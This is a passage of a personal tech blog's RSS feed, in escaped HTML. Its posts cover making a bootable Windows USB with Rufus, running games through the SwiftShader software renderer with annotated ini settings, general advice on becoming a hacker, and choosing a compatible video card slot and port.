&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ_P946CzoLxW0w58fkrNMN2-loi1wcd2zpm_EJEqQgl3uHBK6R8lF994F1qCWI8TdNeI4kxPtFWcxuuvzYKyUS2h_cL7DIZFz6ZsN-ZgiH1LcsfTjKchyphenhyphenZRjvH-zlcwtthgUPXeoRnPE/s1600/5a.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ_P946CzoLxW0w58fkrNMN2-loi1wcd2zpm_EJEqQgl3uHBK6R8lF994F1qCWI8TdNeI4kxPtFWcxuuvzYKyUS2h_cL7DIZFz6ZsN-ZgiH1LcsfTjKchyphenhyphenZRjvH-zlcwtthgUPXeoRnPE/s320/5a.jpg" width="320" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Let it do it's work and after 100% done it'll show you a successful message windows and you're done.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;And after this you need to download usb tool to create a bootable usb named &lt;a href="https://rufus.akeo.ie/downloads/rufus-2.2.exe" target="_blank"&gt;RUFUS&lt;/a&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN658xkQMDu92wQxiKlKCxy3XAvLQ1eoM_nEhgCN-5VOfbca0xa9a7utWW6IlMwBBP4mvLAUUomPuMTz1u-TuYc38A80WjsbHC4kH6Ya9rsjdGTtdwyZ4FLA7tckiyLPXR0pD2oUW5w5g/s1600/rufus_en.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN658xkQMDu92wQxiKlKCxy3XAvLQ1eoM_nEhgCN-5VOfbca0xa9a7utWW6IlMwBBP4mvLAUUomPuMTz1u-TuYc38A80WjsbHC4kH6Ya9rsjdGTtdwyZ4FLA7tckiyLPXR0pD2oUW5w5g/s320/rufus_en.jpg" width="213" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Using the drive button on the rufus software select your ISO file path you've recently give on the media creation tool window and click on start and wait for 10-15 minutes and after completing restart your PC and select your USB device on boot menu as default boot device.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;That's all folks, continue your installation and it is similar to windows 8.1 installation.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Sorry for posting after longtime, I've been working on a real time site for my shop which is about marriage Album Designing and you can visit it @ &lt;a href="http://digitalcrew.esy.es/" target="_blank"&gt;DIGITALCREW&lt;/a&gt; on your interest.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="color: #444444;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/proxy/AVvXsEiRZN0ut7rsOFb6uIGvVYXAMKipTa3i2A1Baeb8ZRKiPoeDvQB0tUH-on_kMnQhEFI76EQFRucNqPvkDmoOMI1ZvunA1fVz50YhR5Fz_UVL4fgBYD9FArSUfZxwdOcAVGSdiTbb2jpnonHgFOYzglSCT23DilD-lLMzjhyphenhyphen_8D3weo6MMbA7ZmfF8QbrqzyF2eqq-CQ=" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" style="background: transparent; border: 0 !important;" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;/div&gt;

&lt;!-- Blogger automated replacement: "https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2Fsignatures.mylivesignature.com%2F54491%2F59%2FBA5EF054215578AD968E7D6605217914.png&amp;amp;container=blogger&amp;amp;gadget=a&amp;amp;rewriteMime=image%2F*" with "https://blogger.googleusercontent.com/img/proxy/AVvXsEiRZN0ut7rsOFb6uIGvVYXAMKipTa3i2A1Baeb8ZRKiPoeDvQB0tUH-on_kMnQhEFI76EQFRucNqPvkDmoOMI1ZvunA1fVz50YhR5Fz_UVL4fgBYD9FArSUfZxwdOcAVGSdiTbb2jpnonHgFOYzglSCT23DilD-lLMzjhyphenhyphen_8D3weo6MMbA7ZmfF8QbrqzyF2eqq-CQ=" --&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizDaka6Bu2_6P35TVH8i4cLzvB5ozajZiANXsICF649QKKKaHOo-c97y6xla-5EfuS3ekompknu9TRMTskxZ4uMJiMkMGSTF5ccK0k6sLa0j9TXuZ4V2_NKbhpRu49HB2yvVjYTiYIRoI/s72-c/1.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to play games without graphics card</title><link>https://snacksofhacks.blogspot.com/2014/01/how-to-play-games-without-graphics-card.html</link><category>MuSt C</category><category>TeCh</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 28 Jan 2014 12:55:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-2642379839841768770</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRmfqya_Df1KkqEkOvl5b6cuZVmuHrYcw27oORGvitLKvq_imAynjreoYQu-uQTj203yeEX76hNsthfUwFKBeibQLo0u5GrXEhHMI5DHkq5ul5_K6_y6-Hnpmc5uKpRq3hKjFrh-8Znk0/s1600/Download-Swift-Shader.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRmfqya_Df1KkqEkOvl5b6cuZVmuHrYcw27oORGvitLKvq_imAynjreoYQu-uQTj203yeEX76hNsthfUwFKBeibQLo0u5GrXEhHMI5DHkq5ul5_K6_y6-Hnpmc5uKpRq3hKjFrh-8Znk0/s320/Download-Swift-Shader.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #999999;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&amp;nbsp;Hi, friends today i'm going to explain you how to play a game in your pc without graphics card.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #999999;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Yes, this sounds crazy isn't it?&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #999999;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;After a lot of struggle I've found this trick or software which can be used to play games without graphics card by using a technology called "Software 3D rendering".&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #999999;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;First of all you must find the software called &lt;span style="font-size: large;"&gt;"&lt;a href="http://www.2shared.com/file/-2bDzulg/SwiftShader_30.html" target="_blank"&gt;Swiftshader&lt;/a&gt;"&lt;/span&gt;. Usually it is not a software but a simple ".dll" file which will be used for playing or using it for software(graphic) compression.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #999999;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;After downloading the file, extract it to the root folder of any game which cannot be played without graphic card.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #999999;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;using a swiftshader.ini file the software configures the game and makes less graphics as much as it can.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #999999;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Below are the settings to play a game without lagging.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #999999;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&amp;nbsp;Open "swiftshader.ini" and do following changes.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[Capabilities]&lt;br /&gt;PixelShaderVersion=30 &amp;lt;-----change it to the version the game requires 10,14,20 or 30 (10 = 1.0, 20 = 2.0, 30 = 3.0)&lt;br /&gt;VertexShaderVersion=30 &amp;lt;-----change it to the version the game requires 10,14,20 or 30 (10 = 1.0, 20 = 2.0, 30 = 3.0)&lt;br /&gt;TextureMemory=256 &amp;lt;----- Increase it if you have Ram more than 1GB if not then leave it to 256 &lt;br /&gt;Identifier=0&lt;br /&gt;&lt;br /&gt;[Caches]&lt;br /&gt;VertexRoutineCacheSize=1024 &amp;lt;-----Dont change anything . It wont increase FPS &lt;br /&gt;PixelRoutineCacheSize=1024&lt;br /&gt;SetupRoutineCacheSize=1024&lt;br /&gt;VertexCacheSize=64&lt;br /&gt;&lt;br /&gt;[Quality]&lt;br /&gt;TextureSampleQuality=2 &amp;lt;----- Change this to reduce quality of game.I Dont know it increase performance or not &lt;br /&gt;MipmapQuality=1 &amp;lt;----- Turn Off MIPMAP to increase FPS +1&lt;br /&gt;PerspectiveCorrection=1 &amp;lt;---change this to 0 &lt;br /&gt;TranscendentalPrecision=2 &amp;lt;---change this to 0 &lt;br /&gt;TransparencyAntialiasing=0&lt;br /&gt;&lt;br /&gt;[Processor]&lt;br /&gt;ThreadCount=0&lt;br /&gt;EnableSSE3=1&lt;br /&gt;EnableSSSE3=1&lt;br /&gt;EnableSSE4_1=1&lt;br /&gt;&lt;br /&gt;[Optimization]&lt;br /&gt;OptimizationPass1=1&lt;br /&gt;OptimizationPass2=0&lt;br /&gt;OptimizationPass3=0&lt;br /&gt;OptimizationPass4=0&lt;br /&gt;OptimizationPass5=0&lt;br /&gt;OptimizationPass6=0&lt;br /&gt;OptimizationPass7=0&lt;br /&gt;OptimizationPass8=0&lt;br /&gt;OptimizationPass9=0&lt;br /&gt;OptimizationPass10=0&lt;br /&gt;&lt;br /&gt;[Testing]&lt;br /&gt;DisableServer=0&lt;br /&gt;ForceWindowed=0 &amp;lt;---- Change it to 0 to do some test on swiftshader cause sometimes the game will freeze u can easily End the process using Windows task manager &lt;br /&gt;ComplementaryDepthBuffer=0&lt;br /&gt;PostBlendSRGB=0&lt;br /&gt;ExactColorRounding=0&lt;br /&gt;DisableAlphaMode=0&lt;br /&gt;Disable10BitMode=0&lt;br /&gt;FrameBufferAPI=0&lt;br /&gt;Precache=0 &amp;lt;---- Precache will preload textures which means it will improve Performance &lt;br /&gt;ShadowMapping=3 &amp;lt;---- Change it to 0 to disable shadow mapping in games it will increase FPS&lt;br /&gt;&lt;br /&gt;[LastModified]&lt;br /&gt;Time=1291707648&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #999999;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Save it and run your game and you should be wondering how this happened and njoy with this software.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://blogger.googleusercontent.com/img/proxy/AVvXsEiRZN0ut7rsOFb6uIGvVYXAMKipTa3i2A1Baeb8ZRKiPoeDvQB0tUH-on_kMnQhEFI76EQFRucNqPvkDmoOMI1ZvunA1fVz50YhR5Fz_UVL4fgBYD9FArSUfZxwdOcAVGSdiTbb2jpnonHgFOYzglSCT23DilD-lLMzjhyphenhyphen_8D3weo6MMbA7ZmfF8QbrqzyF2eqq-CQ=" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" style="background: none repeat scroll 0% 0% transparent; border: 0px none ! important;" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;

&lt;!-- Blogger automated replacement: "https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2Fsignatures.mylivesignature.com%2F54491%2F59%2FBA5EF054215578AD968E7D6605217914.png&amp;amp;container=blogger&amp;amp;gadget=a&amp;amp;rewriteMime=image%2F*" with "https://blogger.googleusercontent.com/img/proxy/AVvXsEiRZN0ut7rsOFb6uIGvVYXAMKipTa3i2A1Baeb8ZRKiPoeDvQB0tUH-on_kMnQhEFI76EQFRucNqPvkDmoOMI1ZvunA1fVz50YhR5Fz_UVL4fgBYD9FArSUfZxwdOcAVGSdiTbb2jpnonHgFOYzglSCT23DilD-lLMzjhyphenhyphen_8D3weo6MMbA7ZmfF8QbrqzyF2eqq-CQ=" --&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRmfqya_Df1KkqEkOvl5b6cuZVmuHrYcw27oORGvitLKvq_imAynjreoYQu-uQTj203yeEX76hNsthfUwFKBeibQLo0u5GrXEhHMI5DHkq5ul5_K6_y6-Hnpmc5uKpRq3hKjFrh-8Znk0/s72-c/Download-Swift-Shader.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>3 Ways to become a hacker</title><link>https://snacksofhacks.blogspot.com/2013/11/3-ways-to-become-hacker.html</link><category>HaCkinG</category><category>MuSt C</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 29 Nov 2013 13:29:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-5558083244621254471</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://t2.gstatic.com/images?q=tbn:ANd9GcROdkjFUi95dCKGcMIG_TR6EAEElYlCo4V1EkzgOSuhQKr-_VW8" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://t2.gstatic.com/images?q=tbn:ANd9GcROdkjFUi95dCKGcMIG_TR6EAEElYlCo4V1EkzgOSuhQKr-_VW8" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: large;"&gt;H&lt;/span&gt;acking, that sounds crazy, isn't it? In computer security context, a &lt;b&gt;hacker&lt;/b&gt; is someone who seeks and exploits weaknesses in a computer system or computer network. &lt;b&gt;Hacker&lt;/b&gt;s may be motivated by a multitude of reasons, such as profit, protest, or challenge.The subculture that has evolved around hackers is often referred to as the computer underground and is now a known community. While other uses of the word hacker exist that are not related to computer security, such as referring to someone with an advanced understanding of computers and computer networks, they are rarely used in mainstream context.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Classifications&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Several subgroups of the computer underground with different attitudes use different terms to demarcate themselves from each other, or try to exclude some specific group with which they do not agree.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Eric S.Raymond&lt;/b&gt;(author of THE New Hacker's Dictionary) advocates that members of the computer underground should be called crackers. Yet, those people see themselves as hackers, Instead of a hacker/cracker dichotomy, they give more emphasis to a spectrum of different categories, such as &lt;span style="color: white;"&gt;White hat&lt;/span&gt;, &lt;span style="color: #666666;"&gt;Grey hat&lt;/span&gt;, Black hat and &lt;span style="color: #6fa8dc;"&gt;Script Kiddie&lt;/span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&amp;nbsp;Am I boring to you. I'm really sorry about that we will go for your cause of presence here/&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Hacking is not a simple thing it needs so much dedication, intelligence and an analytic mind.Unfortunately there is no shortcut or magic to become a hacker you need to learn from your colleges or elder who are interested or it is better to consult your programming teacher.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;To become a hacker, you first must have a keen interest in computers, how they work, their components and how computers communicate at the lowest level. If you aren't a programmer, you need programing skills.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Eric Raymond suggests that you learn Python first. After becoming comfortable with Python, you should learn C/C++, Java, Perl and LISP. Python, Java and Perl are all C-based languages but Python is an easier first language to grasp. LISP is an ancient language (in computer terms) but its approach will give you a different perspective on programming and will make you a better programmer and hacker.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;You also need to obtain an open source operating system such as Linux, FreeBSD or OpenSolaris to use to hone your skills. Using existing code as a guide helps you learn to program.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;b&gt;Other than programming, what other skills do you need as a hacker?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Look back at the list of attributes given earlier: dedication, intelligence, analytic, problem-solving, communications and persistence.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;You'll need dedication because becoming a competent hacker doesn't happen quickly. Like any job, you need to start small, grow and set personal goals. You need to have at least average intelligence.Believe it or not, the ability to communicate verbally and in writing is extremely valuable and is an essential tool in your skillset. And, Eric Raymond further suggests that you need at least a functional grasp of English, the language of hacking.&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Finally, read all that you can about computer security, hacking and programming.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;And, as kRishna tEj would say, "Happy Hacking!"&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&amp;nbsp;You can find some latest updated news on hacking at &lt;a href="http://timesofindia.indiatimes.com/topic/hacking" target="_blank"&gt;Times&lt;/a&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;a href="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" style="background: none repeat scroll 0% 0% transparent; border: 0px none ! important;" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Finding a compatible video card for your system</title><link>https://snacksofhacks.blogspot.com/2013/11/finding-compatible-video-card-for-your.html</link><category>TeCh</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Fri, 29 Nov 2013 11:45:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-1348869758072586652</guid><description>&lt;div style="text-align: left" dir="ltr" trbidi="on"&gt;&lt;a style="margin-bottom: 1em; float: left; clear: left; margin-right: 1em" href="http://www.blogger.com/blogger.g?blogID=3441350317927969357" imageanchor="1"&gt;&lt;/a&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;span style="font-size: large"&gt;A&lt;/span&gt;s we all know that Video cards(Graphics Cards) are required for many GAMES and some software that require higher memory usage and also for multimedia purpose. Video cards require two things to be compatible with your computer. The card must physically fit into your computer’s video slot. The card’s ports—its connectors—must match the ones on your monitor. Then, you also have to consider what features you want (and can afford);&lt;/span&gt;&lt;/span&gt;    &lt;br /&gt;    &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;/span&gt;    &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;b&gt;&lt;span style="font-size: large"&gt;Finding a compatible video slot&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;    &lt;br /&gt;    &lt;div style="text-align: center; clear: both" class="separator"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;/span&gt;&lt;/div&gt;    &lt;div style="text-align: center; clear: both" class="separator"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;/span&gt;&lt;/div&gt;   &lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;Your computer most likely comes with one of two types of video slot:PCI-Express or AGP. In fact, your PC probably comes with a PCI-Express 16x slot because that slot has been built-into most computers for the past five years;&lt;/span&gt;&lt;/span&gt;    &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;/span&gt;    &lt;br /&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;b&gt;PCI-Express(Peripheral Component Interface-Express):&lt;/b&gt; Found on nearly every PC sold since 2005, PCI-Express slots dominate the video card world. PCI-Express slots come in several sizes: most video cards require the largest size, which is called 16x. Conveniently, most newer computers come with a 16x slot.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;img src="http://media.wiley.com/Lux/73/225973.image0.jpg" /&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;br /&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;b&gt;AGP(Accelerated Graphics Port): &lt;/b&gt;Venerable PCs hailing from the late 1990s through 2005 often came with an AGP slot. An AGP slot is usually chocolate brown. Although the slot’s been through several revisions, most AGP slots accept either 4x or 8x AGP cards. You can still find a few AGP cards sold online at &lt;a title="NewEgg" href="http://www.newegg.com/" target="_blank"&gt;NewEgg&lt;/a&gt; and &lt;a title="Amazon" href="http://www.amazon.com/" target="_blank"&gt;Amazon&lt;/a&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;img src="http://media.wiley.com/Lux/74/225974.image1.jpg" /&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;b&gt;&lt;span style="font-size: large"&gt;Finding a compatible video port&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;    &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;You need to buy a video card that has at least one port that matches a port on your monitor. (Most video cards come with two or more ports.)&lt;/span&gt;&lt;/span&gt;    &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;Examine the connectors on your monitor to find any combination of these four:&lt;/span&gt;&lt;/span&gt;    &lt;br /&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&amp;#160;&lt;span style="font-size: medium"&gt;&lt;b&gt;VGA(Video Graphics Array) or D-SUB:&lt;/b&gt; This early video connector simply won’t die. A VGA port works fine as a last resort to stay compatible, but the next three ports provide better-quality video.&lt;/span&gt;&lt;/span&gt;      &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;This figure shows a VGA port on a video card(left), cable connector(middle), and monitor(right).&lt;/span&gt;&lt;/span&gt;      &lt;br /&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;span style="font-size: medium"&gt;&lt;img src="http://media.wiley.com/Lux/75/225975.image2.jpg" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&amp;#160;&lt;span style="font-size: medium"&gt;&lt;b&gt;DVI(Digital Visual Interface):&lt;/b&gt; This port sends numbers to a flat-panel monitor, which converts those digits into pictures. This figure shows a DVI port on a video card(left), cable connector(middle), and monitor(right).&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;    &lt;blockquote&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif"&gt;&lt;img src="http://media.wiley.com/Lux/76/225976.image3.jpg" 